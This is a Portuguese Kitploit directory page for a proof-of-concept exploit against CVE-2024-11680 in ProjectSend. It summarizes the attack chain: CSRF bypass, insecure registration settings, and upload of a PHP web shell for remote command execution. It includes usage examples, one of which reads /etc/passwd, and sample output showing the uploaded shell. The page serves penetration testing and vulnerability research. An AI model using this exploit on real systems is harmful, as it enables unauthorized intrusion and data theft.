Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-11680 — Este repositório contém um exploit de prova de conceito (PoC) para CVE-2024-11680, uma vulnerabilidade crítica no ProjectSend r1605 e versões anteriores. O exploit visa autenticação incorreta devido a problemas com configurações de privilégios incorretas e injeção de comandos. | Kitploit
Ferramentas/GitHubGitHub/qucklecrabik/cve-2024-11680
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubqucklecrabik/cve-2024-11680

CVE-2024-11680

Este repositório contém um exploit de prova de conceito (PoC) para CVE-2024-11680, uma vulnerabilidade crítica no ProjectSend r1605 e versões anteriores. O exploit visa autenticação incorreta devido a problemas com configurações de privilégios incorretas e injeção de comandos.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
há 5 mesesAinda não revisado
Compartilhar

Exploit do ProjectSend CVE-2024-11680

Este é um exploit de prova de conceito para o CVE-2024-11680, uma vulnerabilidade de modificação de configuração não autenticada e upload de web shell no ProjectSend.

Descrição

O exploit aproveita múltiplas vulnerabilidades no ProjectSend:

  • Bypass do token CSRF permitindo alterações de configuração
  • Configurações inseguras de registro de cliente
  • Upload de arquivo sem restrições levando à execução remota de código

Requisitos

  • Python 3.x
  • Pacotes Python necessários:
    root@kitploit:~
    pip install requests colorama
    

Uso

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -c <COMMAND>

Argumentos

  • -u, --url: URL alvo (ex.: )
http://target.com/projectsend
  • -c, --command: Comando a executar no alvo (padrão: id)
  • Exemplos

    root@kitploit:~
    # Get Python version
    python3 exploit.py -u http://target.com/projectsend -c "python3 -V"
    
    # List directory contents
    python3 exploit.py -u http://target.com/projectsend -c "ls -la"
    
    # Get system information
    python3 exploit.py -u http://target.com/projectsend -c "uname -a"
    
    # Read passwd file
    python3 exploit.py -u http://target.com/projectsend -c "cat /etc/passwd"
    

    Como funciona

    1. Reconhecimento: Obtém o token CSRF e verifica a vulnerabilidade do alvo
    2. Manipulação de Configuração: Ativa opções inseguras de registro de cliente
    3. Registro de Usuário: Cria uma nova conta de cliente com aprovação automática
    4. Upload de Arquivo: Envia um web shell PHP com extensão .phtml
    5. Execução de Comandos: Executa comandos especificados através do shell enviado

    Recursos

    • Extração automática de token CSRF
    • Geração aleatória de credenciais de usuário
    • Nomenclatura inteligente de arquivos e detecção de timestamp
    • Saída colorida para melhor visibilidade
    • Capacidade de execução de comandos integrada

    Aviso Legal

    Esta ferramenta é apenas para fins educacionais. Use-a com responsabilidade e somente em sistemas nos quais você tenha permissão explícita para testar.

    Referências

    • CVE-2024-11680

    Exemplo de Saída

    root@kitploit:~
    [+] Target is vulnerable
    [+] Insecure options enabled
    [+] User registered successfully.
    [+] New username: NoDLQWYF
    [+] New password: X02A3g9LuN4S
    [+] File uploaded: kLoISqdA.phtml
    [+] File accessible at: http://target.com/projectsend/upload/files/1774958997-3b58e110c289baddfd8a6d1d5f34d96e77009fdc-kLoISqdA.phtml
    [+] Command Output:
    Python 3.9.2
    
    Baixar ferramenta